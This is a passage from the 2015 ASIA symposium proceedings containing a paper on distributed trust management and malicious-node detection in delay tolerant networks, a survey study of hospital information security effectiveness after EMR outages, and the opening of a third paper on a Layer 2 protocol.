[49] M. Mihailescu and Y. M. Teo, “Dynamic resource pricing on federatedclouds,” in Cluster, Cloud and Grid Computing (CCGrid), 2010 10thIEEE/ACM International Conference on. IEEE, 2010, pp. 513–517.

[50] J. Mirkovic, M. Robinson, and P. Reiher, “Alliance formation forddos defense,” in Proceedings of the 2003 workshop on New securityparadigms. ACM, 2003, pp. 11–18.

[51] Y. K. Penya, J. C. Nieves, A. Espinoza, C. E. Borges, A. Pena, andM. Ortega, “Distributed semantic architecture for smart grids,” Energies,vol. 5, no. 11, pp. 4824–4843, 2012.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 50

Trust Management in Resource Constraint Networks

Thomas A. Babbitt and Boleslaw K. SzymanskiDepartment of Computer ScienceRensselaer Polytechnic Institute

Troy, New YorkEmail: {babbit, szymab}@rpi.edu

Abstract—There are numerous environments or situationswhere a computer network has one or more constraints. Impactof these constraints can range from minimal user inconveniencesto catastrophic reduction of capabilities. These constraints allowavailability of information at the cost of abandoning the safetyand reliability of traditional routing and security protocols. Anumber of environments in which such networks are neededinclude those present in military battlefields, first respondermissions or remote environments. Resource Constraint Networks(RCN) are a class of networks capable of working in such austereenvironments. Delay Tolerant, Wireless Sensor, and some mobileand mesh ad-hoc networks fall under the broader definition ofRCN. In order to provide additional information assurance (IA)security services above information availability such as integrity,confidentiality, and authentication require significant modificationto traditional routing and security protocols. One method is tomanage trust in a distributed manner in order to make valid trustvalues available to a node. Using them, a node can then makedecisions on how and when to forward a message through thenetwork. While not traditional authentication, distributed trustcan be used as a probabilistic proxy, and allow for more securetransmission of information from source to destination in a RCN.The use of path information in a DTN allows for malicious nodedetection. We show how using erasure coding, complete pathinformation, and inferences assist in better identifying maliciousnodes in a DTN.

Keywords—Resource Constraint Networks, Delay Tolerant Net-works, Distributed Trust Management, Discrete Event Simulations

I. INTRODUCTION

There are a number of scenarios where networks expe-rience one or more significant constraints. This is either bydesign, due to the environment, or because of conditionschanging in an environment. Military and first responderscould be in situations where lack or destruction of com-munication infrastructure makes using traditional networkingmethods difficult or impossible. A Resource Contained Net-work (RCN) is any network with a resource constraint(s),such that significant modification of traditional InformationAssurance (IA), security, or routing protocols are requiredto provide the security services of information availability,integrity, authentication, confidentiality, and non-repudiation.One example discussed in literature is Delay Tolerant Net-works (DTN) where the nodes are mobile and are spread outin such a manner that static end-to-end routing is not possibleand hence constrained. Another example is Wireless SensorNetworks (WSN) where nodes with minimal hardware areused to monitor environmental or other variables, the majorconstraint is battery power. It is challenging to provide IA

security services of integrity, authentication, and confidentialityin a RCN.

While security and trust are not equivalent, in a DTNor WSN the use of centralized servers is not feasible. Theability to trust that a node is not compromised or actingselfish is paramount. Recently a number of studies on trusthave been published that outline a framework for trust in aDTN or WSN. The authors in [1] give a good overview oftrust in multiple disciplines and propose a number of trustcharacteristics and properties that can be used as a baseline fordetermining the clues or metrics used to construct a distributedtrust management system. Table I shows the characteristics andproperties outlined in [1].

Resource Constrained Networks require accurate and se-cure message transmission like any other type of network.As previously stated, there are a number of applications andsituations where a RCN is necessary. Most of the routing andsecurity protocols in RCNs use redundancy. The authors in[2] use redundancy as a means of determining clues for usein determining path probability. This in conjunction with theuse of erasure coding show positive results in determiningmalicious nodes under a limited threat model, using only directobservations and directly connected nodes.

Recently a few trust management schemes for use in a DTNhave been proposed [3]–[5]. Each of them relies on two trustcomponents. The first is a direct trust consisting of clues orobservable actions of other nodes and the second is an indirecttrust component consisting of referrals, reputation, or recom-mendations from other nodes. These values are aggregated ina number of differing ways to determine a trust value that isused to identify nodes that act malicious or selfish. In [3] theauthors use a Bayesian approach to determine probability thata node is acting good based on good and bad observations. In[4] the authors creates a bipartite graph and find outliers; thescheme removes nodes with probabilities outside of a certainvalue to converge on a trust value. A third approach outlined in[5] uses both direct and indirect metrics and determines goodversus bad encounters over four categories to aggregate a trustvalue.

This paper advances the idea of using path, temporal,and information redundancy proposed in [2]. It shows thepower of utilizing path information and introduces inferredtrust properties. Further exploration of direct trust is discussedin Section II and indirect trust is presented in Section III.Conclusions and future work are discussed in Section IV.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 51

TABLE I. TRUST CHARACTERISTICS AND PROPERTIES OF A DTN [1]

Characteristic Properties1) established based on potential risks 1) dynamic2) context-dependent 2) subjective3) based on nodes interest 3) not necessarily transitive4) learned 4) asymmetric5) may represent system reliability 5) context-dependent

II. DIRECT TRUST: USE OF FULL PATH

In a resource constraint network, a node directly observesnetwork traffic within its transmitter/receiver range. Based onthe actions of other nodes, direct observations can be used tomake trust decisions. The authors in [2] use erasure coding asa routing protocol with an appended checksum to determineclues about a node or nodes that act maliciously by modifyingall message segments received through normal network routingin a DTN and then making trust decisions. This approach onlytakes into account nodes directly connected to the destination.The results in [2] show that using path clues to identifiedmalicious nodes has merit.

Fig. 1 presents a state diagram showing how a nodeprocesses each message M it receives. Before sending amessage to the destination, the source will append a checksumto it and utilizing erasure coding will break a message into anumber of segments s such that any k < s segments willenable the destination to recreate the original message. Theexact encoding algorithm is not relevant to this paper; however[6] presents a good overview of multiple encoding options ina DTN.

Assuming node i is the destination for message M , node istarts in state S1 and continues to track message segments mas they arrive. If m is unique, the segment is stored in nodei’s buffer and the message segment ID is saved in set nM . Ifm ∈ nM , then the SegMatch function is called. Once k uniquesegments arrive, node i attempts to recreate the message usingthe SegRec function. Node i then transitions to either state S2if it fails or S3 if successful.

Once in state S2, node i continues to wait for additionalsegments m. If m ∈ nM , then SegMatch is called, elseSegRec is called. If SegRec is successful, then destination itransitions to state S3, else it determines if it is better to waitor resend the message from the source. The utility functionsfor waiting are presented in [2]. If it is better to re-transmitthe message, then node i sends a message to node j to resendthe message.

Most routing protocols in RCNs send an acknowledgementright after a successful delivery to the destination. This clearsnode buffers and avoids wasting resources to send a message orsegment through the network once it is successfully delivered.Taking advantage of path and temporal redundancy node istays in state S3 for a time period and accepts additionalsegments m. It continues to recreate the message using k − 1known good segments and makes trust decisions based on thesuccess of the message recreation.

The SegRec function iterates through all permutations ofmessage segments received for M and returns those that suc-cessfully recreate the message. When the number of segmentsreceived is k that requires one check. Once |nM | > k then

Fig. 1. Node State Diagram

(|nM |k

)iterations are required. This is the basis for the utility

functions mentioned above for state S2.

A number of research questions remain. This sectionpresents two additional concepts using direct observations tomake trust decisions. The first is to utilize full path knowledgeand the second is to observe differences of the same messagesegments along different paths (SegMatch).

A. Expanded Path Information

Nodes make trust decisions in [2] based on the directlyconnected nodes. Only the nodes that send each segment to thedestination or an intermediate node with enough segments torecreate M make trust modifications. Fig. 2a shows an exampleof this. Assume that the source is node 1 and the destinationis node 10 and the number of segments required to recreatea message M is k = 3. Each of the three required segmentstake a different path, namely {1, 2, 3, 4, 10}, {1, 5, 6, 10} and{1, 5, 7, 8, 9, 10}. In this case, node 10 only increases the trustlevel for nodes 4, 6 and 9 even though six other nodes werealong the paths that the segments traveled.

Each node along a path appends its id to each segment asit flows through the network. Assuming nodes act truthfully,the destination will have the path for each segment. UsingFig. 1, upon transitioning to state S3 trust is distributed alongthe paths used to recreate the message. Let’s denote the trustchange to be calculated as z. Fig. 2b shows an example of thisdistribution. Each directly connected node receives z increaseand then divides that value by 2h, where h is the number ofhops back from the destination along a given path. If there isa situation where a node, directly connected to the destination,is along npath multiple paths, such as node 9, then the trustincrease is z × npath. In the example node 3 receives z

2 andnode 5 receives 3z

8 because it is along two paths one at hop 3and the other at hop 4 from the destination.

Additionally negative trust can be distributed back alonga path. Assume node 10 is in state S3, for message M ,and waiting for additional segments to make trust decisions.A segment of message M arrives using the red path inFig. 2b. Negative trust can be distributed back along the path{1, 2, 3, 4, 10}. Other than the source, node 1, receiving z

8 allother values will be the same.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 52

(a) Path Trust Distribution in [2] (b) Updated Trust Distribution

Fig. 2. Trust Distribution Changes

B. Trust Updates Using Segment Matching (SegMatch)

Fig. 1 shows all the states that a node goes through foreach message M . When a node is in state S1 or S2 and m ∈nM , signifying that the node has seen m before, SegMatch iscalled. This is done to compare the paths that the two identicalsegments took to arrive at a particular node.

In Fig. 3, node 1 is the source and node 7 is the destinationthat received m along multiple paths. The paths segment mfollowed are {1, 2, 5} and {1, 3, 4}. Assume that at any giventime there is a set of “trusted” nodes consisting of all nodesabove a certain threshold and designating this as set A. InFig. 3 all of the green nodes are above that threshold so A ={1, 2, 4, 6}. The set of all node along the paths m took is B ={1, 2, 3, 4, 5}. The set of suspect nodes C = B −A = {3, 5}.

When two segments m for message M arrive at node iwith the same id along different paths the payloads of the meither match or not. If they do not match then some small trustdeduction is merited; if they are the same then a small increaseis merited. Equation 1 is the trust reduction function for nodesin set C. Because a nodes trust can fluctuate, we consider allnodes suspect and assume C = B.

Node i reduces trust for each j ∈ C; the new trust NTi,j isthe current trust CTi,j minus a small penalty that consists ofthree parts. The first part (1−CTi,j) links the penalty to nodei’s current trust level for node j. If a node is more trustworthyit receives a smaller penalty. The second part z

a , where a is thenumber of elements in C, divides the penalty z by the numberof possible culprits. The more there are, the more ambiguity,so the smaller the penalty. The final part

(1 + (1− pnx)

|B|)

again takes into account the number of nodes. The value for(1 + (1− pnx)

|B|)

is the probability that a certain number ofnodes are all bad. This takes into account both the size of thenetwork and the current trust average for the network, pnx.

NTi,j = CTi,j −((1− CTi,j)×

z

a×(1 + (1− pnx)

|B|)) (1)

Equation 2 shows the trust increase when message seg-ments along both paths are the same. Equation 2 is the resultof solving Equation 1 for CTi,j and then substituting NTi,j forCTi,j and vice-versa. This makes it so that events that happen

in sequence one good and one bad with no other changes resultin the trust value of a node remaining the same as it was priorto both events.

NTi,j =CTi,j + z

a

(1 + (1− pnx)

|B|)

1 + za

(1 + (1− pnx)

|B|) (2)

C. Simulation Results for Direct Trust

A number of simulations were conducted utilizing NS3and the DTN module proposed by Lakkokorpi et al. in [7] andthe node trust management object DtnTrust proposed in [2].Modifications to the DtnTrust object include tracking the pathof each message segment, distributing trust along paths, andmaking incremental updates when the message segments havethe same id but arrived along different paths.

The simulations run in [2] are rerun here with the modifica-tions listed above. A total of 40 nodes are randomly placed ona 2500m x 2500m grid and move utilizing a random way point(RWP) mobility model. Each node sends multiple various sizemessage segments using erasure coding. The average of ten1000 second simulation runs is used. The same random seedsare used for both set of results.

Fig. 4 and 5 show the power of full path knowledge. Fig. 4shows results with the fraction of nodes that act truthfullyset to 90% and Fig. 5 shows results with this fraction set to60%. Subfigures b show the results with full path knowledge,while Subfigures a without. There is a pronounced difference

Fig. 3. SegMatch Example

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 53

(a) 90% Path Trustworthiness as per [2] (b) 90% Path Trustworthiness with Modification

Fig. 4. Ranking of All Nodes According to Their Trustworthiness pnx = 0.9

(a) 60% Path Trustworthiness as per [2] (b) 60% Path Trustworthiness with Modification

Fig. 5. Ranking of All Nodes According to Their Trustworthiness pnx = 0.9

between trust values for good and bad nodes in Fig. 4b vs. 4a.Higher pollution by bad nodes makes the results less clearwhen the fraction of good nodes decreases. In future research,we plan to exclude recognized bad nodes from being usedin routing which would help to prevent this effect. We willalso investigate stronger trust increases for nodes behavingcorrectly.

III. INFERRED TRUST

Nodes can infer trust based on interactions. Fig. 6 showsnodes i and j. Assuming that they are within broadcast rangeand have sufficient time to transmit, they first trade their trustinformation about other nodes in the network. This is used toupdate the trust levels for both nodes. In this example, nodei sends its trust vector (shaded green), to node j and receivesnode j’s trust vector in return. Node i maintains a (n+ 1)×ninferred trust matrix that consists of trust vectors received fromother nodes with an appended time stamp; the trust vectorreceived from node i is shaded red. Each entry in node i’sinferred trust matrix is a value between 0.0 and 1.0. A nodewill state that it trusts itself at level 1.0 so the diagonal is all1’s. The column for i in the inferred trust matrix (in yellow)is the inferred trust vector. In addition there are two (n +1)× 1 vectors. The direct trust vector (in blue) is updated bydirect trust observations made by node i with a time stamp.The aggregate trust vector (in green) is the combination ofthe inferred and direct trust vectors. Any trust decision madeby node i is done based on the trust values in aggregate trust

vector (green).

The inferred trust vector is maintained through two pro-cesses. The first is a periodic update based on the inferred trustmatrix. After a certain time period or number of encountersthe vector is updated. See Section III-A for more details. Thesecond process occurs each time a node receives the trustvector from another node in the network. See Section III-B.

A. Periodic Updates to Inferred Trust Vector

Equation 3 finds the difference between what node i hasstored in its trust vector and what node j broadcasts as its trustvector. The difference is determined for each node w ∈ N ,where N is the set of all nodes in the network. This value ismultiplied by the square of the node i’s trust of node j givingmore weight to trusted nodes.

Ciw =

(T ij

)2 × (T iw − T j

w

)(3)

The difference is not immediately used to update node i’strust vector, but is maintained for a time interval ∆t in theinferred trust matrix. Once the time interval is complete, theset of nodes from which node i received trust vectors D, isaveraged and node i updates it inferred trust vector using the

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 54

Fig. 6. Storage at node i

following equation.

T iw = T i

w + β

|D|∑f=1

Cfw

|D|

(4)

B. Direct Updates to Inferred Trust Vector

Node i updates trust based on any discrepancy betweenits aggregate trust vector and the trust vector sent by node j.There are two cases when node i receives the trust vector fromnode j. Case 1 is that all values in the inferred trust vectorfor node i are within τ of all values in the trust vector fromnode j ( |

(T iw − T j

w

)| < τ for all w ∈ N ). Case 2 occurs if

one or more of such values are not within τ . Case 1 resultsis a small increase of trust for node j in node i’s inferredtrust matrix. For case 2, trust is decreased for all w where|(T iw − T j

w

)| ≥ τ . Equation 5 defines the change in trust for

node i and Equation 6 prescribes the change in trust for allother nodes that are outside τ .

T ij = T i

j ×(

1− α× d2 (|N | − 2)

)(5)

T iw = T i

w ×(

1− α

2d

)(6)

For the updated set of equations, there are four tunableparameters, α, β, ∆t and τ .

1) α - This is the penalty weight in Equations 5 and 6.The variable d is the number of discrepancies. If d =0 then no nodes get a penalty and the equations arenot used.

2) β - This is the weight given to the indirect observationand it is a value between 0.0 and 1.0.

3) ∆t - This is the time period the nodes waits betweentrust updates.

4) τ - This is the risk taken, it represents the acceptabledifference between node i and j’s declared trust fornode w before node i makes trust changes.

C. Simulation Results for Indirect Trust

In order to test some of the tunable parameters, a simulationengine is proposed that acts as a discrete event simulator [8].A complete graph, is created using the number of nodes nin a given network. Each edge weight is a random numberuniformly distributed between [0.0,1.0) and it represents theintermeeting time between nodes connected by this edge. Ifthe edge weight is 1.0 then the nodes are in constant contactand if it is 0.0 they never meet. This simulates an arbitrarymobility pattern in the network.

Internal events are those that are node driven and externalevents are those driven by the interaction between nodes. Theformer are based primarily on node attributes and the lateron edge weights. The only internal event, used for this setof simulations, is a node trust update associated with the ∆tvalue. If node i’s timer expires, set to ∆t, it triggers a nodetrust update event using Equation 4.

The external events are the node meeting events. They arederived from the intermeeting time between nodes. The nextmeeting is based on a Poisson distribution (assumed here andin other publications to be the distribution for intermeetingtimes between nodes) using the following equation.

mTimei,j+ = −(

1

wi,j× ln([0, 1])

)(7)

Where mTimei,j is the current meeting time between nodei and node j, initialized prior to each run using the righthand side of Equation 7. The value wi,j is the inverse of theintermeeting time which is also the weight given to each edgein the complete graph.

Each simulation consists of 1000 runs for each 3 ≤ n ≤50 nodes and returns the average time to converge and thenumber of node updates that occur. Each node also maintainsthe last time it updated its trust initialized at the beginninguniformly over the interval [0.0,∆t), its inferred trust vectorinitialized with values uniformly distributed between [0.0.1.0),and inferred trust matrix with all zeros. For each run of thesimulation, each event is taken in order and follows the rulesabove depending on the event type. The run ends when either

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 55

(a) Time to Converge, cf = 0.05 (b) Number of Updates, cf = 0.05

Fig. 7. Effect of ∆t

10,000 time units expire or all nodes have converged to thesame trust values plus or minus a convergence factor, cf , fromthe average.

Fig. 7 shows a couple of key points that justify furtherresearch. The first is that the system converges rather quickly.Fig. 7a shows the exact times with cf = 0.05 for multiplevalues of ∆t. The second key point is that after the networksize reaching n ≈ 20 the time levels off for all ∆t. The thirdis that the shorter the ∆t the faster the network converges, asintuitively expected. The fourth is that the number of updatesincreases in a linear fashion as n increase for all ∆t, as seenin Fig. 7b.

IV. FUTURE WORKS AND CONCLUSIONS

The results above show the improvement arising from theuse of full path knowledge. The potential for further improve-ments from using inferred trust is one of the goals of futureresearch. Some additional improvements include integration ofthe direct and inferred clues, exploration of additional directand confirmation of inferred clues, threat model expansion andcomparisons with other proposed trust management schemes[3]–[5].

The use of complete paths as a clue advances the resultsin [2]. Research into additional clues and the best methodsto identify potential cheaters as well as the effect on noderesources should better identify limitations. Indirect or inferredclues add overhead that must be considered.

The fundamental issue for trust management is to convergeto a state in which the bad nodes can be identified. Inthe paper, the assumed threat model was that the bad nodewould not try to hide, so the longer the scheme runs themore differences between bad and good nodes arise. Withsophisticated adversaries, which switch between bad and goodbehavior, it will be important that a good period does noterase all sins from the past. We believe that our use of thecurrent trust in assigning penalties and rewards is a goodway to address this issue, but the right weights need to be

established experimentally. This will be an important directionof our future work.

ACKNOWLEDGMENT

This work was supported in part by the Army ResearchLaboratory under Cooperative Agreement Numbers W911NF-06-3-0001 and W911NF-09-2-0053. The views and conclu-sions contained in this paper are those of the authors andshould not be interpreted as representing the official policieseither expressed or implied of the Army Research Laboratoryor the U.S. Government.

REFERENCES

[1] J.-H. Cho, A. Swami, and I.-R. Chen, “A Survey on Trust Managementfor Mobile Ad Hoc Networks,” Communications Surveys & Tutorials,IEEE, vol. 13, no. 4, pp. 562–583, 2011.

[2] T. A. Babbitt and B. K. Szymanski, “Trust management in delay tolerantnetworks utilizing erasure coding,” in IEEE ICC 2015 - Ad-hoc andSensor Networking Symposium (ICC’15 (09) AHSN), London, UnitedKingdom, Jun. 2015.

[3] M. K. Denko, T. Sun, and I. Woungang, “Trust management in ubiquitouscomputing: A Bayesian approach,” Computer Communications, vol. 34,no. 3, pp. 398–406, Mar. 2011.

[4] E. Ayday and F. Fekri, “An iterative algorithm for trust managementand adversary detection for delay-tolerant networks,” Mobile Computing,IEEE Transactions on, vol. 11, no. 9, pp. 1514–1531, Sept 2012.

[5] I.-R. Chen, F. Bao, M. Chang, and J.-H. Cho, “Dynamic trust manage-ment for delay tolerant networks and its application to secure routing,”Parallel and Distributed Systems, IEEE Transactions on, vol. 25, no. 5,pp. 1200–1210, May 2014.

[6] Y. Wang, S. Jain, M. Martonosi, and K. Fall, “Erasure-coding basedrouting for opportunistic networks,” in Proceedings of the 2005 ACMSIGCOMM workshop on Delay-tolerant networking, ser. WDTN ’05.New York, NY, USA: ACM, 2005, pp. 229–236.

[7] J. Lakkakorpi and P. Ginzboorg, “ns-3 module for routing and congestioncontrol studies in mobile opportunistic dtns,” in Performance Evaluationof Computer and Telecommunication Systems (SPECTS), 2013 Interna-tional Symposium on, July 2013, pp. 46–50.

[8] K. Wehrle, M. Gunes, and J. Gross, Modeling and Tools for NetworkSimulation. Springer Science & Business Media, 2010.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 56

Investigating Information Security Effectiveness after

an Extreme Event

Victoria Kisekka

University at Buffalo

Buffalo, NY, USA

Abstract—This research in progress investigates the

antecedents of effective Information Security (IS) of an

organization following an extreme event. The motivation for this

research is the rife of information security incidents, which pose

increasing risks to business continuity especially in the aftermath

of an extreme event when organizations may lack sufficient

resources to effectively safeguard their networks. A sample size

of 207 survey responses was gathered from 10 organizations. The

results show that Incident Command Leadership (ICL) and

employee empowerment have a positive influence with IS

effectiveness. The relationship between organizational resilience

and IS effectiveness was not supported. These preliminary

findings have implications for information security and business

continuity theories. The findings also have implications for

practice.

Keywords—information security effectiveness; health

information security; extreme events; emergency preparedness

I. INTRODUCTION

The increasing multitude of information security incidents has raised concerns regarding the safety of information and network resources in general. Security practitioners have further anticipated a rife of more sophisticated security attacks in the future. Moreover, the vulnerability of information resources to security-related incidents is further exacerbated during the aftermath of an extreme event when an organization may be operating under stress due to limited resources and uncertainties. Naturally, following the extreme event, organizations focus on continuing business operations. In a hospital organization, the priority is on patient care and as such, information security procedures may be easily ignored or incorrectly implemented unknowingly. One way to minimize the potential occurrence of security breaches after an extreme event is to improve the effectiveness of IS solutions after an extreme event. Maintaining a high level of security after an event is very important to both patients and hospitals. For patients, a security breach could lead to identity theft. Hospitals on the other hand may experience financial loss, reduction in employee productivity, and considerable damage to the hospital’s reputation.

The objective of this research in progress paper is to investigate the antecedents of IS effectiveness after an extreme event. IS effectiveness relates to the extent to which information is protected from adversarial behavior. The term extreme event is used in this research to refer to an incident that disrupts normal operations in an organization. The extreme event studied is Electronic Medical Record (EMR) system

outages. The motivation for this research is that risks associated with information security are enormously increased after an extreme event. The increased risk is due to uncertainty, which increase the likelihood of human-errors. Previous studies have also documented several security attacks that have occurred or are likely to occur during emergency response [1]. Failure to protect information can have severe consequences affecting patients’ health and even hospitals in terms of profit and loss of competitive advantages.

In this research, the effect of ICL, employee empowerment, and the organization’s level of resilience on IS effectiveness after an extreme event are investigated using a survey instrument. The rest of the paper is organized as follows. The next section presents the hypotheses, which is followed by the methodology. In the last section the results are discussed.

II. THEORETICAL DEVELOPMENT

The theoretical foundation for this study is the Information Security effectiveness model [2]. The model examines organizational-level constructs that enhance the effectiveness of IS. The causal relationships investigated in prior literature include organizational size, management support, and type of services rendered [2]. I extend this model to the extreme events area by investigating three key variables, namely, ICL, employee empowerment, and organizational resilience. Each of these variables is discussed in detail in the next paragraphs.

Incident Command Leadership (ICL): ICL is defined in this research as a unified command structure or a single individual responsible for managing all activities related to the extreme event. Establishing leadership during the extreme event improves collaborative efforts by ensuring that there is a single chain of command and reduces the likelihood of effort duplication. Effective leadership skills are essential for properly managing an extreme event [3]. In the information systems literature, effective management has been linked to increased engagement in more IS practices [2]. These findings suggest that incident command leaders may be able to encourage individuals to engage in information security behavior and to ensure that personal information is well protected after the extreme event. For these reasons, I hypothesize the following:

H1: Incident Command Leadership will have a positive influence on information security effectiveness after an extreme event.

Employee empowerment: Employee empowerment pertains to an individual’s “perception of control, competence, and goal

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 57

internalization [4]. Empowered employees have a high capacity for independent decision-making and generally take an initiative to act or perform productively. The marketing literature provides support for the positive relationship between empowerment and several aspects of performance such as increased responsiveness to failures [5, 6] and productivity [7]. This suggests that when individuals are empowered to independently take on tasks, to improvise in the absence of necessary resources, and to use previously acquired skills, they are more likely to also be prepared to take appropriate actions to safeguard protected information after an extreme event. From this, I hypothesize the following:

H2: Employee empowerment will have a positive influence on information security effectiveness after an extreme event.

Organizational resilience: Resilience pertains to the organization’s ability to maintain service continuity following an extreme event. This ability is determined by how quickly the organization is able to ‘bounce back’ to normal operations [8]. At the organizational level, resilience also promotes organizational performance [9]. Resilience, therefore, represents an organization’s inherent capacity to withstand disturbances and to maintain operations. A resilient organization is more likely to maintain the functionality of its operations, including the protection of sensitive information, compared to a non-resilient organization. This leads us to hypothesize the following:

H3: Organizational resilience will have a positive influence on information security effectiveness after an extreme event.

The proposed research model is shown in Fig. 1.

Fig 1. Theoretical model investigating the causal relationships of IS effectiveness after an extreme event.

III. METHODOLOGY

Data were collected using a survey instrument. The dependent variable in this study, IS effectiveness, was measured using four items, adapted and modified from previous studies [10, 11]. The items were: information protection against internal threats, information protection against external threats, access control, and secure information sharing. ICL was measured using five items: two of the items, namely, the leader’s ability to anticipate workflow problems

and avoid crisis, and empowering individual situational decision awareness were adapted from Kayworth and Leidner [12]. The rest of the items were self created, namely; the presence of a leader to manage activities related to the extreme event, and leader’s ability to inspire confidence, and the employees’ level of trust in the leader’s effectiveness. Employee empowerment was measured using three items adapted from Menon [4]: employees’ capabilities, competence, and work efficiency after the extreme event. Lastly, organizational resilience was measured using three items related to bouncing back. These were adapted from Smith, Dalen [13]. All items were anchored on a seven-point scale ranging from ‘strongly disagree’ (1) to ‘strongly agree’ (7). All questions in the survey were referent shifted from the individual to the organizational level. All measures were reflective.

A. Sample

The survey was administered to hospital staff in 10 different hospitals in the Western New York region. Out of the 590 individuals surveyed, 207 completed surveys were returned.

B. Data Analyses

The psychometric properties of the measurement scales were tested using SPSS. The results in Table 1 show that convergent validity and discriminate validity were met based on the recommended guidelines [14]. The sample was tested for sampling adequacy using maximum likelihood extraction with varimax rotation. Kaiser– Meyer– Olkin (KMO)'s measure of sampling adequacy was .906, which is considered to be excellent [15]. The variance between the variables was also tested using Bartlett’s test of sphericity. The test was statistically significant, indicating the existence of relationships in the data (p < 0.00), (α = 0.00, X2 = 3456.979, df =105).

TABLE I. ITEM FACTOR LOADINGS

Information

Security

Effectiveness

(Sec)

Incident

Command

Leadership

(ICL)

Employee

Empower-

ment

(Emp)

Organizational

Resilience

(Res)

Sec1 .823 .260 .245 .211

Sec2 .794 .169 .183 .205

Sec3 .688 .40 .271 .256

Sec4 .666 .244 .242 .335

ICL1 .287 .875 .182 .164

ICL2 .288 .853 .149 .187

ICL3 .142 .818 .179 .242

ICL4 .211 .808 .251 .267

ICL5 .184 .816 .148 .196

Emp1 .229 .193 .926 .202

Emp2 .268 .229 .834 .131

Emp3 .207 .228 .733 .339

Res1 .291 .301 .242 .844

Res2 .299 .257 .255 .840

Res3 .275 .308 .205 .829

The data were also tested for multicollinearity. The observed values of Tolerance were above 0.1 and the Variance Inflation Factors were below 10 as recommended in the literature [16].

The hypothesized research model was subsequently tested using Partial Least Squares regression. The research model was supported at P<.01, R2 = 70.8%, R2 adjusted = 70.4%. The

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 58

supported relationships include ICL (t=3.033, p = .003) and employee empowerment (t=2.255, p = 0.025) which were positively associated with IS effectiveness. The relationship between organizational resilience and IS effectiveness was not supported (t=1.158, p = 0.247).

IV. DISCUSSION AND CONCLUSION

The results supported the hypothesized positive relationship between ICL and IS effectiveness after an extreme event. This finding confirms earlier studies that found a link between leadership and effective emergency management [3]. The predicted model also supported the positive relationship between employee empowerment and IS effectiveness. This means that when employees are empowered, they engage in behavior or activities that promote the organization’s ability to recover from a failure. The results did not support the link between organizational resilience and IS effectiveness. These results have several implications. While unplanned incidents are often characterized by chaos, stress, and uncertainty, effective leadership through encouragement of information security behavior is crucial to IS effectiveness. Organizations should take the necessary steps to create effective leaders whose ability to manage unplanned incidents would ensure optimal security of protected information. Organizations also need to create incident response policies and procedures that provide detailed guidelines for establishing incident command structures for managing the incident. In regards to employee empowerment, the results provide evidence that even after an extreme event, empowered individuals are able to independently take the necessary actions to mitigate any effects of the incident that may adversely impact IS effectiveness. It is suggested, therefore, that organizations invest in their employees but providing them with access to resources that teach self-empowerment.

This study is still a work in progress. There are other relationships that are still being investigated.

ACKNOWLEDGMENT

This research was funded by the National Science Foundation Graduate Research Fellowship under Grant 1241709. The usual disclaimer applies.

REFERENCES

[1] Loukas, G., D. Gan, and T. Vuong. A taxonomy of cyber attack and defence mechanisms for emergency management networks. in Proceedings of the Third International Workshop on Pervasive Networks for Emergency Management (IEEE PerNem 2013), San Diego, CA, USA. 2013.

[2] Kankanhalli, A., et al., An integrative study of information systems security effectiveness. International Journal of Information Management, 2003. 23(2): p. 139-154.

[3] Waugh, W.L. and G. Streib, Collaboration and leadership for effective emergency management. Public Administration Review, 2006. 66(s1): p. 131-140.

[4] Menon, S., Employee empowerment: An integrative psychological approach. Applied Psychology, 2001. 50(1): p. 153-180.

[5] Hocutt, M.A. and T.H. Stone, The impact of employee empowerment on the quality of a service recovery effort. Journal of Quality Management, 1998. 3(1): p. 117-132.

[6] Miller, J.L., C.W. Craighead, and K.R. Karwan, Service recovery: a framework and empirical investigation. Journal of Operations Management, 2000. 18(4): p. 387-400.

[7] Savery, L.K. and J.A. Luks, The relationship between empowerment, job satisfaction and reported stress levels: some Australian evidence. Leadership & Organization Development Journal, 2001. 22(3): p. 97-104.

[8] Tugade, M.M. and B.L. Fredrickson, Resilient individuals use positive emotions to bounce back from negative emotional experiences. Journal of personality and social psychology, 2004. 86(2): p. 320.

[9] Vidal, R., H. Carvalho, and V.A. Cruz-Machado. Strategic Resilience Development: A Study Using Delphi. in Proceedings of the Eighth International Conference on Management Science and Engineering Management. 2014. Springer.

[10] Lee, Y.W., et al., AIMQ: a methodology for information quality assessment. Information & management, 2002. 40(2): p. 133-146.

[11] Kim, D.J., N. Sivasailam, and H.R. Rao, Information assurance in B2C websites for information goods/services. Electronic Markets, 2004. 14(4): p. 344-359.

[12] Kayworth, T.R. and D.E. Leidner, Leadership effectiveness in global virtual teams. Journal of Management Information Systems, 2002. 18(3): p. 7-40.

[13] Smith, B.W., et al., The brief resilience scale: assessing the ability to bounce back. International journal of behavioral medicine, 2008. 15(3): p. 194-200.

[14] Backhaus, J., et al., Test–retest reliability and validity of the Pittsburgh Sleep Quality Index in primary insomnia. Journal of psychosomatic research, 2002. 53(3): p. 737-740.

[15] Hutcheson, G.D. and N. Sofroniou, The multivariate social scientist: Introductory statistics using generalized linear models. 1999: Sage.

[16] O’brien, R.M., A caution regarding rules of thumb for variance inflation factors. Quality & Quantity, 2007. 41(5): p. 673-690.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 59

A Layer 2 Protocol to Protect the IP Communication

in a Wired Ethernet Network

Reiner Campillo Technical Manager – RADEI Project

Ministry of Higher Education, Science and Technology

